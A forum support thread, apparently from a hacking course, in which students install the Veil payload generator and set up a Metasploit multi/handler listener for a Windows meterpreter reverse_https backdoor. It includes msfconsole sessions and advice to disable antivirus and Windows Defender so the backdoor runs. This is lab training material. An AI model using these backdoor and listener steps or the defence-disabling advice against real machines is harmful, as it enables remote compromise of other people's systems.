Viewing 12 posts - 1 through 12 (of 12 total)
  • Author
    Posts
  • #43922
    justin741008
    Participant

    When I go to install veil it does this error

    #43927
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Can you try this solution:

    apt update
    apt install -y aptitude
    aptitude install -y veil

    You have to run this commands in a fresh custom kali.

    Let me know how it goes!
    Diego

    #43974
    justin741008
    Participant

    I got this far. Not sure if I can ignore this or not? My anti virus caught something that was corrupt. Not sure what to do next.

    #43986
    Diego PérezDiego Pérez
    Moderator

    Hi!
    You’ll need to disable your AV or defender in host and the try it again.

    Let me know how it goes!
    Diego

    #43988
    justin741008
    Participant

    Yeah I did that it worked. Thanks

    #44030
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Cool you got it!
    Diego

    #45096
    Patient
    Participant

    Hi Diego,
    Had an issue trying to listen on a port after generating my rev_https_8080 backdoor on VEIL.
    On my MSF Console, when I use exploit/multi/handler then show options , It’ doesn’t show all the options (LHOST & LPORT etc…)
    This is what I have as a result:

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > show options
    Module options (exploit/multi/handler):
    Name Current Setting Required Description
    —- ————— ——– ———–

    Exploit target:
    Id Name
    — —-
    0 Wildcard Target

    Thanks for any feedback on how to solve this… I’m still searching for a workaround.

    BR//
    Patient

    #45099
    Diego PérezDiego Pérez
    Moderator

    Hi!
    You have to set the payload first.

    When you are inside multi handle run:

    set PAYLOAD your/payload/here

    the show options and they will be displayed for you.

    Let me know how it goes!
    Diego

    #45105
    Patient
    Participant

    Hi Diego,
    Thanks for your replies/ I set the Payload and it seems Okay.

    ———————————————————————-
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
    set PAYLOAD windows/meterpreter/reverse_https set PAYLOAD windows/meterpreter/reverse_https_proxy
    msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
    PAYLOAD => windows/meterpreter/reverse_https
    msf5 exploit(multi/handler) > show options

    Module options (exploit/multi/handler):
    Name Current Setting Required Description

    —- ————— ——– ———–

    Payload options (windows/meterpreter/reverse_https):

    Name Current Setting Required Description

    —- ————— ——– ———–

    EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
    LHOST yes The local listener hostname
    LPORT 8443 yes The local listener port
    LURI no The HTTP Path

    Exploit target:

    Id Name
    — —-
    0 Wildcard Target

    Best regards,
    Patient K

    #45107
    Patient
    Participant

    Hello Diego,
    After trying to run the backdoor, Lol… The windows 10 (Windows defender) machine saw it as follows:
    The file contained a virus and was deleted: Finally I simply disable the firewall to move forward. I’ll come back after the lectures to play around.

    Trojan:Win32/Leivon!rfn
    Alert level: Severe
    Category: Trojan
    Details: This program is dangerous and xecutes commands from an attacker:

    Best regards,
    Patient

    #45108
    Patient
    Participant

    Hey it’s me again…
    can’t see the ***STARTING THE PAYLOAD HANDLER*** message after I run my exploit.

    msf5 exploit(multi/handler) > exploit
    [*] Started HTTPS reverse handler on https://10.0.2.15:8080

    Best regards,
    Patient

    #45158
    Diego PérezDiego Pérez
    Moderator

    Hi!
    That message is not displayed anymore in the latest metasploit versions, so don’t worry about it.

    Greetings!
    Diego

Viewing 12 posts - 1 through 12 (of 12 total)
  • You must be logged in to reply to this topic.